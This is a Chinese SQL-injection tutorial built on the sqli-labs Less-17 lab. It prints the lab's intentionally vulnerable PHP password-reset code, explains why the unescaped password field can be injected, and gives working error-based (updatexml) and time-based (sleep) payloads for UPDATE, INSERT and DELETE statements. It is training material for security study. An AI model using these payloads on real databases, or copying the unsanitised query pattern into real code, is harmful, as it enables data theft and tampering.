mysql在对数据的处理中有增删改查四个操作。而在sql注入中,往往常见的是 select
查询形式。那么insert、delete、update呢?
在ubuntu下搭建docker和开源vulstudy项目(其内含sqli-labs环境)。
sudo apt-get update -y
sudo apt-get install docker.io -y
sudo apt-get docker-compose -y
sudo apt-get git -y
sudo groupadd docker
sudo gpasswd -a ${USER} docker
sudo service docker restart
git clone https://github.com/c0ny1/vulstudy.git
cd /vulstudy/sqli-labs
sudo docker-compose up -d
1、增
insert into table_name(column_name1,column_name2)values('value1','value2');
insert into table_name values('value1','value2');
insert into table_name set column_name1='value1',column_name2='value2';
2、删
delete from table_name where column_name='value';
3、改
update table_name set column_name1='value2' where column_name2='value2';
sqli-labs-Less17代码
<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
error_reporting(0);
function check_input($value)
{
if(!empty($value))
{
// truncation (see comments)
$value = substr($value,0,15);
}
// Stripslashes if magic quotes enabled
if (get_magic_quotes_gpc())
{
$value = stripslashes($value);
}
// Quote if not a number
if (!ctype_digit($value))
{
$value = "'" . mysql_real_escape_string($value) . "'";
}
else
{
$value = intval($value);
}
return $value;
}
// take the variables
if(isset($_POST['uname']) && isset($_POST['passwd']))
{
//making sure uname is not injectable
$uname=check_input($_POST['uname']);
$passwd=$_POST['passwd'];
//logging the connection parameters to a file for analysis.
$fp=fopen('result.txt','a');
fwrite($fp,'User Name:'.$uname."\n");
fwrite($fp,'New Password:'.$passwd."\n");
fclose($fp);
// connectivity
@$sql="SELECT username, password FROM users WHERE username= $uname LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
//echo $row;
if($row)
{
//echo '<font color= "#0000ff">';
$row1 = $row['username'];
//echo 'Your Login name:'. $row1;
$update="UPDATE users SET password = '$passwd' WHERE username='$row1'";
mysql_query($update);
echo "<br>";
if (mysql_error())
{
echo '<font color= "#FFFF00" font size = 3 >';
print_r(mysql_error());
echo "</br></br>";
echo "</font>";
}
else
{
echo '<font color= "#FFFF00" font size = 3 >';
//echo " You password has been successfully updated " ;
echo "<br>";
echo "</font>";
}
echo '<img src="../images/flag1.jpg" />';
//echo 'Your Password:' .$row['password'];
echo "</font>";
}
else
{
echo '<font size="4.5" color="#FFFF00">';
//echo "Bug off you Silly Dumb hacker";
echo "</br>";
echo '<img src="../images/slap1.jpg" />';
echo "</font>";
}
}
?>
1、代码审计:使用check_input函数对输入数据进行过滤, 接着以用户名作为条件查询数据库, 当查询到数据库存在记录时,更新该密码。这是一个密码重置功能的代码。然而在对输入数据进行过滤的过程中,清洗了用户名,却没有清洗密码, 由此导致了sql注入。
2、check_input函数功能:截取输入的数据中前15个字符, 检测服务端是否开启 magic_quotes_gpc
转义,如果有则删除反斜杠, 检测字符串中是否都是数字字符,如果不存在则对特定添加反斜杠,同时以单引号闭合数据, 如果都是数字字符,则将其转化为整数。
3、函数解释:get_magic_quotes_gpc():
stripslashes():
ctype_digit():
mysql_real_escape_string():
intval():
addslashes():
在注入点位置的报错注入与延时注入:没有数据回显联合注入取消,没有布尔回显布尔盲注取消
$update="UPDATE users SET password = '$passwd' WHERE username='$row1'";
1、报错注入
uname=admin&passwd=') and updatexml(1,(concat(0x7e,(select database()),0x7e)),1)#&submit=Submit
2、延时盲注
uname=admin&passwd=') and if((ord(left((select database()),1))=ascii('s')),sleep(1),0)#&submit=Submit
payload自行调整。
上述为update下的注入。由于update、insert和delete三者应用场景的特殊性, 一般不会有数据回显,故一般选取布尔注入和延时注入。1、insert下的注入:
布尔注入:
insert into Rj45(id,word)values(3,updatexml(1,(concat(0x7e,(select database()),0x7e)),1));
延时注入:
insert into Rj45(id,word)values(5,if((ord(left((select database()),1))=ascii('C')),sleep(5),0));
注意,当延时注入成功后,需要修改插入的id数据,防止出现主键唯一性冲突。2、delete下的注入:
布尔注入:
delete from Rj45 where id=0 and updatexml(1,(concat(0x7e,(select database()),0x7e)),1);
延时注入:
delete from Rj45 where id=3 and if((ord(left((select database()),1))=ascii('C')),sleep(5),0);
1、mysql注入天书 2、php手册 https://www.php.net/manual/zh/